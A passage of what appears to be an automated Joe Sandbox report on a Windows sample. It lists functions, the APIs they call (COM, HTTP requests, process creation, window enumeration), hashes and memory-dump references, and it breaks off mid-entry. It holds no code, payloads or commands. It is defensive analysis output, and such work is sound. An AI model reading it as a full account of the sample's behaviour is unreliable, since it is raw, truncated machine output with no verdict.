                                      • Instruction ID: d9779a4234b559f0b36bcc23e6080c1bd02935c56759a70cf36cb18440223a2f
                                      • Opcode Fuzzy Hash: b4b48ade2e932b970ed5a63009e9d01f89a85a1542bd7302717fa531148fc443
                                      • Instruction Fuzzy Hash: 9A11297664C343F9FA25A732EC07EA6379D9B91324B200036FD04E40D5FFA5AC915614
                                      Function 0098B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0098B2D5
                                      • CoInitialize.OLE32(00000000), ref: 0098B302
                                      • CoUninitialize.COMBASE ref: 0098B30C
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0098B40C
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 0098B539
                                      • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0098B56D
                                      • CoGetObject.OLE32(?,00000000,009BD91C,?), ref: 0098B590
                                      • SetErrorMode.KERNEL32(00000000), ref: 0098B5A3
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0098B623
                                      • VariantClear.OLEAUT32(009BD91C), ref: 0098B633
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID:
                                      • API String ID: 2395222682-0
                                      • Opcode ID: ebbdaaf626a723918d3ea9d46123f70c455760565d30ce66cce66f879bc70cc3
                                      • Instruction ID: e43ea6279f420c02d1ac93c6e260c6b3cfb747a93f00cba1d768387cab8230c4
                                      • Opcode Fuzzy Hash: ebbdaaf626a723918d3ea9d46123f70c455760565d30ce66cce66f879bc70cc3
                                      • Instruction Fuzzy Hash: 70C1F1B1608305AFC700EF68C885A6BB7E9BF89318F04495DF58A9B361DB71ED05CB52
                                      Function 0095ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                      Download Yara Rule
                                      APIs
                                      • __lock.LIBCMT ref: 0095ACC1
                                        • Part of subcall function 00957CF4: __mtinitlocknum.LIBCMT ref: 00957D06
                                        • Part of subcall function 00957CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00957D1F
                                      • __calloc_crt.LIBCMT ref: 0095ACD2
                                        • Part of subcall function 00956986: __calloc_impl.LIBCMT ref: 00956995
                                        • Part of subcall function 00956986: Sleep.KERNEL32(00000000,000003BC,0094F507,?,0000000E), ref: 009569AC
                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0095ACED
                                      • GetStartupInfoW.KERNEL32(?,009E6E28,00000064,00955E91,009E6C70,00000014), ref: 0095AD46
                                      • __calloc_crt.LIBCMT ref: 0095AD91
                                      • GetFileType.KERNEL32(00000001), ref: 0095ADD8
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0095AE11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 1426640281-0
                                      • Opcode ID: 05a6aa0c41f457b731c62194f11028e5c13c359680c42719f72ed27bbd37f606
                                      • Instruction ID: 845738a917e055e0d3b5ac4b32c7090d36ab46d4156bef1138bdeacd288e7f1d
                                      • Opcode Fuzzy Hash: 05a6aa0c41f457b731c62194f11028e5c13c359680c42719f72ed27bbd37f606
                                      • Instruction Fuzzy Hash: 558146709053458FCB14CF69C8416ADBBF4AF49336B24435DD8A6AB3D1D334980BCB5A
                                      Function 009767E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 009767FD
                                      • __swprintf.LIBCMT ref: 0097680A
                                        • Part of subcall function 0095172B: __woutput_l.LIBCMT ref: 00951784
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00976834
                                      • LoadResource.KERNEL32(?,00000000), ref: 00976840
                                      • LockResource.KERNEL32(00000000), ref: 0097684D
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 0097686D
                                      • LoadResource.KERNEL32(?,00000000), ref: 0097687F
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0097688E
                                      • LockResource.KERNEL32(?), ref: 0097689A
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009768F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                      • String ID:
                                      • API String ID: 1433390588-0
                                      • Opcode ID: 93e710fff215bb38522a1e42af67e7b3d63d0258d0c39dbfa67c59494e3f4b02
                                      • Instruction ID: 83463da66028ecd1fa1e085e45db56c9df9685a990678beefb25aa18b6402eb0
                                      • Opcode Fuzzy Hash: 93e710fff215bb38522a1e42af67e7b3d63d0258d0c39dbfa67c59494e3f4b02
                                      • Instruction Fuzzy Hash: CF31CD72A0525AABCB109FA1DD48AFA7BACFF08340B008525F916E2140E734D911EBA1
                                      Function 0096CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumChildWindows.USER32(?,0096CF50), ref: 0096CE90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 3555792229-1603158881
                                      • Opcode ID: b754814ddcd059f17fbbc2aec8eae4053b99930e9ae1b6a30e6d2f03702b3a9c
                                      • Instruction ID: f629720c3f9e28c6ca5926f4bf57da6c47c1b42e66ab76e0fba492e24664eb07
                                      • Opcode Fuzzy Hash: b754814ddcd059f17fbbc2aec8eae4053b99930e9ae1b6a30e6d2f03702b3a9c
                                      • Instruction Fuzzy Hash: 6A9192B0A00646ABCB19DF60C481BFAFBB9BF44340F548519E899A7191DF31AD59CBE0
                                      Function 00933093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009330DC
                                      • CoUninitialize.COMBASE ref: 00933181
                                      • UnregisterHotKey.USER32(?), ref: 009332A9
                                      • DestroyWindow.USER32(?), ref: 009A5079
                                      • FreeLibrary.KERNEL32(?), ref: 009A50F8
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009A5125
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: d33bed64d321612be80dd4d25b5352e916d890346f7c1da33a74e7d50433504c
                                      • Instruction ID: 72017c89153b6abb15759da476ac6db068165b1e656a6d1be74aad5397b5a5ce
                                      • Opcode Fuzzy Hash: d33bed64d321612be80dd4d25b5352e916d890346f7c1da33a74e7d50433504c
                                      • Instruction Fuzzy Hash: A49147747452028FC709EF24C999F69F3B8FF45304F5582A9E40AA7262DB30AE66CF50
                                      Function 0094CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 0094CC15
                                        • Part of subcall function 0094CCCD: GetClientRect.USER32(?,?), ref: 0094CCF6
                                        • Part of subcall function 0094CCCD: GetWindowRect.USER32(?,?), ref: 0094CD37
                                        • Part of subcall function 0094CCCD: ScreenToClient.USER32(?,?), ref: 0094CD5F
                                      • GetDC.USER32 ref: 009AD137
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009AD14A
                                      • SelectObject.GDI32(00000000,00000000), ref: 009AD158
                                      • SelectObject.GDI32(00000000,00000000), ref: 009AD16D
                                      • ReleaseDC.USER32(?,00000000), ref: 009AD175
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009AD200
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: 058772f66f6454603973c4a492badf2286e9a19a0557e4e194bad7b2131233c1
                                      • Instruction ID: e3b6a78b681c5af9b57ba8d7c5b8513da082f68a4b32194c48cfc91aec145722
                                      • Opcode Fuzzy Hash: 058772f66f6454603973c4a492badf2286e9a19a0557e4e194bad7b2131233c1
                                      • Instruction Fuzzy Hash: 88711070406204DFCF25CF64C881EBA3BB9FF4A324F144669ED569A6A6D7318C41DFA0
                                      Function 009845C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009845FF
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0098462B
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0098466D
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00984682
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0098468F
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009846BF
                                      • InternetCloseHandle.WININET(00000000), ref: 00984706
                                        • Part of subcall function 00985052: GetLastError.KERNEL32(?,?,009843CC,00000000,00000000,00000001), ref: 00985067
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 1241431887-3916222277
                                      • Opcode ID: 372a092241e091f9f4f5963e5f06e1b1f35d772159300ac16d211fda6bfeeff8
                                      • Instruction ID: 587ea54a858a6136f44916696fc220ffc5beaaea5ecabc98438d944d62f452ca
                                      • Opcode Fuzzy Hash: 372a092241e091f9f4f5963e5f06e1b1f35d772159300ac16d211fda6bfeeff8
                                      • Instruction Fuzzy Hash: 334160B1501206BFEB16AF50CC89FFB77ACFF09354F104126FA059A241EBB49D449BA4
                                      Function 0098B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,009CDC00), ref: 0098B715
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,009CDC00), ref: 0098B749
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0098B8C1
                                      • SysFreeString.OLEAUT32(?), ref: 0098B8EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: 6f28da8992007a8f43281e98fabc8f6502b18b0843999e4b4b345bdb2acd7f1f
                                      • Instruction ID: 0cc665339ef9989cca01b6d003bb104b62f5874e9c423ee3648510f7cb059de0
                                      • Opcode Fuzzy Hash: 6f28da8992007a8f43281e98fabc8f6502b18b0843999e4b4b345bdb2acd7f1f
                                      • Instruction Fuzzy Hash: 97F14C75A00209EFCF04EF94C888EAEB7B9FF89315F148459F915AB250DB31AE45CB90
                                      Function 009924D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 009924F5
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00992688
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009926AC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009926EC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0099270E
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0099286F
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009928A1
                                      • CloseHandle.KERNEL32(?), ref: 009928D0
                                      • CloseHandle.KERNEL32(?), ref: 00992947
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      • Opcode ID: 4f8bb1432738ab661836ece3bff2d9eeea7ecd2b0d3b19a7e5514b12a200f421
                                      • Instruction ID: 40128cac31c8ee4609fe703ddceec2a5352e49ac9f2efeb0752feabb47f6055d
                                      • Opcode Fuzzy Hash: 4f8bb1432738ab661836ece3bff2d9eeea7ecd2b0d3b19a7e5514b12a200f421
                                      • Instruction Fuzzy Hash: DDD1AF71604301EFCB14EF29C491B6EBBE5AF85314F14896DF8999B2A2DB31EC44CB52
                                      Function 0094B73E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0094B759,?,00000000,?,?,?,?,0094B72B,00000000,?), ref: 0094BA58
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0094B72B), ref: 0094B7F6
                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0094B72B,00000000,?,?,0094B2EF,?,?), ref: 0094B88D
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 009AD8A6
                                      • DeleteObject.GDI32(00000000), ref: 009AD91C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 2402799130-0
                                      • Opcode ID: 9ca1f84a1d9e03448bca3caa1c49b2ba152853fef81bc37efa1055aa71bf66ea
                                      • Instruction ID: af4882c0c6e0ac8e9c5ff3a25be7300c49b12ee0cde2e8d1816494e46c54a917
                                      • Opcode Fuzzy Hash: 9ca1f84a1d9e03448bca3caa1c49b2ba152853fef81bc37efa1055aa71bf66ea
                                      • Instruction Fuzzy Hash: 25618A3052A601DFDB359F19D988B36B7F9FF96325F24051DE04686A70C774E890EB80
                                      Function 0099B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0099B3F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 3c4b383c0a5c9d73defe3f9e217446002ae02159d4a54d00e48c310a04a00167
                                      • Instruction ID: 33baeab54d1ca28db33dc6323fa266263f092888b28d4fc89246a3554a0982f8
                                      • Opcode Fuzzy Hash: 3c4b383c0a5c9d73defe3f9e217446002ae02159d4a54d00e48c310a04a00167
                                      • Instruction Fuzzy Hash: 7351A130501208FBEF249F2CEE86BAD3B68AB05324F644515F619D61E2D7B9E940EB51
                                      Function 0094A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009ADB1B
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009ADB3C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009ADB51
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009ADB6E
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009ADB95
                                      • DestroyCursor.USER32(00000000), ref: 009ADBA0
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009ADBBD
                                      • DestroyCursor.USER32(00000000), ref: 009ADBC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 3992029641-0
                                      • Opcode ID: 3412d58e9820331dcbda558ee021bb83fcf82ec09c3cf4a69e9aaf6492509bc0
                                      • Instruction ID: 8f590040717865ae5d565f077524e5737fcb1fd92a93932dd93ae38dc91cdd13
                                      • Opcode Fuzzy Hash: 3412d58e9820331dcbda558ee021bb83fcf82ec09c3cf4a69e9aaf6492509bc0
                                      • Instruction Fuzzy Hash: 31518B70A55208EFDB24CF68CC81FAA77B9BB58364F110618F946D7690D7B0AD80DBA0
                                      Function 00977555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00975FA6,?), ref: 00976ED8
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00975FA6,?), ref: 00976EF1
                                        • Part of subcall function 009772CB: GetFileAttributesW.KERNEL32(?,00976019), ref: 009772CC
                                      • lstrcmpiW.KERNEL32(?,?), ref: 009775CA
                                      • _wcscmp.LIBCMT ref: 009775E2
                                      • MoveFileW.KERNEL32(?,?), ref: 009775FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
